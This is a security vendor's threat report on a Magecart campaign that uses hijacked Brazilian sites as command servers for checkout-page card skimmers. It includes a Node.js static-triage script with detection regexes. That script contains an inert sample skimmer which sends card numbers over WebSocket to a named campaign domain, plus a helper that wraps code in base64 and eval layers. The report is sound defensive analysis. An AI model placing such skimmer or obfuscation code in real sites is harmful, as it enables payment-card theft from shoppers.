Magecart Repurposes Legitimate Brazilian Sites for C2 - July 22, 2025
SOURCE DEFENSE RESEARCH INTELLIGENCE NEWS
The Source Defense Research Team has uncovered a covert Magecart campaign targeting Brazilian e-commerce sites. This attack demonstrates how legitimate websites can be hijacked to serve as Command and Control (C2) servers, becoming unwitting hubs for digital skimming operations.
Attack details
The attackers first compromise legitimate Brazilian websites and inject malicious JavaScript obfuscated in several layers: the payload is base64-encoded, and the decoded stages are assembled at run time with calls such as String.fromCharCode(). This turns otherwise benign sites into command-and-control (C2) hosts for the campaign.
With that C2 infrastructure in place, the attackers compromise additional Brazilian online stores. Rather than adding a third-party tag, they modify the stores' own first-party scripts to include a hidden reference to the loader hosted on the compromised C2 sites. The altered scripts stay dormant until the shopper reaches the payment page, at which point they fetch the skimmer from the C2 server and execute it.
This approach offers two key advantages:
Stealth during normal use or testing, as the malicious script activates only at checkout, evading detection during casual browsing or QA reviews.
Legitimacy masking, since the skimmer is loaded from a seemingly trustworthy domain in the same country: the compromised C2 site.
Once activated, the script captures the payment data the shopper enters and exfiltrates it to the same C2 server, confirming that the attackers fully control the hijacked site.
Attack highlights
First-party origin: the attack is launched from code embedded directly in the victim site's own scripts, not from a third-party integration, so controls that vet third-party tags or allowlist script sources never see a new script origin. CSP is a weaker control here than against a third-party tag: the modified first-party script is already trusted by the policy, so only a tight connect-src (covering WebSocket endpoints) and the absence of 'unsafe-eval' stand between the loader and the skimmer it has to execute from a string.
WebSocket exfiltration: both the skimmer delivery and the data theft run over WebSockets, which most security tools monitor far less closely than HTTP requests.
Previously unknown infrastructure: at the time of discovery, neither clicktrack01[.]com nor jartrack01[.]com had any history of malicious activity; their presence in threat intelligence feeds stems solely from this disclosure.
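The loader and skimmer behaviour described under "Attack details" and "Attack highlights" can be triaged statically, without ever executing the script. The following is an added example written for this write-up; it is not Source Defense code and not the campaign's code. It peels the base64 and String.fromCharCode() layers the report names, then checks the decoded text for checkout-page gating, WebSocket use, reads of payment input fields, and contact with the two published domains. The inert sample loader, the indicator regexes, the Portuguese keyword "pagamento", and the wss:// URL form (the report gives only the domain) are assumptions; it runs under Node.js.

```javascript
// Added example for this write-up (not Source Defense code, not the campaign's
// code): statically peel the base64 / String.fromCharCode layers described
// above, then triage the decoded script for the behaviours reported: checkout
// gating, WebSocket traffic to the published C2 domains, and reads of payment
// input fields. Nothing is evaluated; it runs under Node.js (uses Buffer).

// Domains published in the write-up (shown there defanged as clicktrack01[.]com
// and jartrack01[.]com).
const IOC_DOMAINS = ["clicktrack01.com", "jartrack01.com"];

// Constructed, inert sample of what a decoded loader might look like. It is an
// assumption for exercising the checks and is never executed. The wss:// URL
// form is assumed; the write-up gives only the domain.
const SAMPLE_PLAINTEXT =
  'if (location.pathname.indexOf("/checkout") !== -1) {' +
  ' var s = new WebSocket("wss://clicktrack01.com/");' +
  ' s.onopen = function () {' +
  '  s.send(document.querySelector(\'input[name="cardNumber"]\').value);' +
  ' };' +
  '}';

// Wrap plaintext in the two layers the write-up names: an inner
// String.fromCharCode() stage, then an outer base64 stage under eval(atob()).
function buildLayeredSample(plain) {
  const codes = Array.from(plain, (ch) => ch.charCodeAt(0)).join(",");
  const inner = "eval(String.fromCharCode(" + codes + "))";
  const b64 = Buffer.from(inner, "latin1").toString("base64");
  return 'eval(atob("' + b64 + '"))';
}

const ATOB_RE = /atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/;
const FROMCHARCODE_RE = /String\.fromCharCode\(\s*([\d\s,]+)\)/;

// Peel one decoding layer at a time, replacing each decoder call with its
// output as text, and record which layers were removed. maxLayers bounds the
// loop so a malformed or self-referential sample cannot spin forever.
function peelLayers(src, maxLayers = 10) {
  let code = src;
  const layers = [];
  for (let i = 0; i < maxLayers; i++) {
    let m;
    if ((m = ATOB_RE.exec(code))) {
      const decoded = Buffer.from(m[1], "base64").toString("latin1");
      code = code.replace(m[0], () => decoded); // function form: no "$" expansion
      layers.push("base64");
    } else if ((m = FROMCHARCODE_RE.exec(code))) {
      const decoded = m[1]
        .split(",")
        .map((n) => n.trim())
        .filter((n) => n !== "")
        .map((n) => String.fromCharCode(Number(n)))
        .join("");
      code = code.replace(m[0], () => decoded);
      layers.push("fromCharCode");
    } else {
      break;
    }
  }
  // Each peeled stage leaves an eval(...) wrapper around the next one.
  const evalWrap = /^eval\((.*)\)$/s;
  while (evalWrap.test(code)) code = code.replace(evalWrap, "$1");
  return { code, layers };
}

// Indicator checks. "raw" runs on the script as found (the loader itself needs
// eval or Function to run decoded text); "decoded" runs on the peeled code.
// Keywords are assumptions, including "pagamento" (Portuguese, since the
// targets are Brazilian stores).
const CHECKS = [
  { id: "dynamic-eval",  scope: "raw",     re: /\b(?:eval|Function)\s*\(/ },
  { id: "checkout-gate", scope: "decoded", re: /location\.(?:href|pathname)[^;{]*?(?:checkout|payment|pagamento)/i },
  { id: "websocket",     scope: "decoded", re: /new\s+WebSocket\s*\(/i },
  { id: "payment-field", scope: "decoded", re: /input\[name\s*[*^$]?=\s*["']?(?:card|cc|cvv|cvc|expir)/i },
];

function triage(src) {
  const { code, layers } = peelLayers(src);
  const indicators = CHECKS
    .filter((c) => c.re.test(c.scope === "raw" ? src : code))
    .map((c) => c.id);
  // Hosts contacted over ws:// or wss://, matched against the published IOCs.
  const hosts = [];
  const wsRe = /wss?:\/\/([A-Za-z0-9.-]+)/gi;
  let m;
  while ((m = wsRe.exec(code))) hosts.push(m[1].toLowerCase());
  const iocHits = hosts.filter((h) => IOC_DOMAINS.includes(h));
  if (iocHits.length) indicators.push("ioc-domain");
  const verdict = indicators.length >= 3 ? "skimmer" : indicators.length ? "suspicious" : "clean";
  return { layers, indicators, hosts, iocHits, verdict };
}

// Usage: triage(buildLayeredSample(SAMPLE_PLAINTEXT)) reports layers
// ["base64", "fromCharCode"], all five indicators and verdict "skimmer".
```

The point of peeling statically rather than running the sample in a sandbox is that the loader's first action is to contact the C2 host; a decoder that only rewrites text can be run over every first-party script on a checkout page during a review without touching attacker infrastructure. The indicator list is deliberately short and readable; in practice it would be extended with the selectors and paths of the store under review.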
How Source Defense protects from such attacks
Customers using Protect are already secure:
The Source Defense system blocks the skimmer script fetched from the C2 server before it can load, regardless of how it is obfuscated or how legitimate its hosting domain appears.
For Detect users and incident response teams, Source Defense provides clear, actionable alerts when:
Scripts are loaded from blacklisted C2 domains
Sensitive data is sent to blacklisted destinations
Unauthorized access is made to PII input fields (e.g., name, email, phone)
These alerts are raised via:
Email notifications to those users who opted-in
The in-app bell notification center
The in-app dashboard, where the 'Found in blacklists' and 'Script behaviors' widgets show the findings after drill-down, flagged in red for high-severity issues
Whether malicious code appears through first-party obfuscation or external C2 delivery, Source Defense ensures both proactive blocking and detailed visibility.
Summary
This campaign shows how Magecart doesn’t just attack websites—it repurposes them. A trusted domain today could be a C2 server tomorrow.
If you're not actively inspecting every script on your site, especially those that seem legitimate, you're trusting exactly what threat actors count on you to ignore, and you're not secure.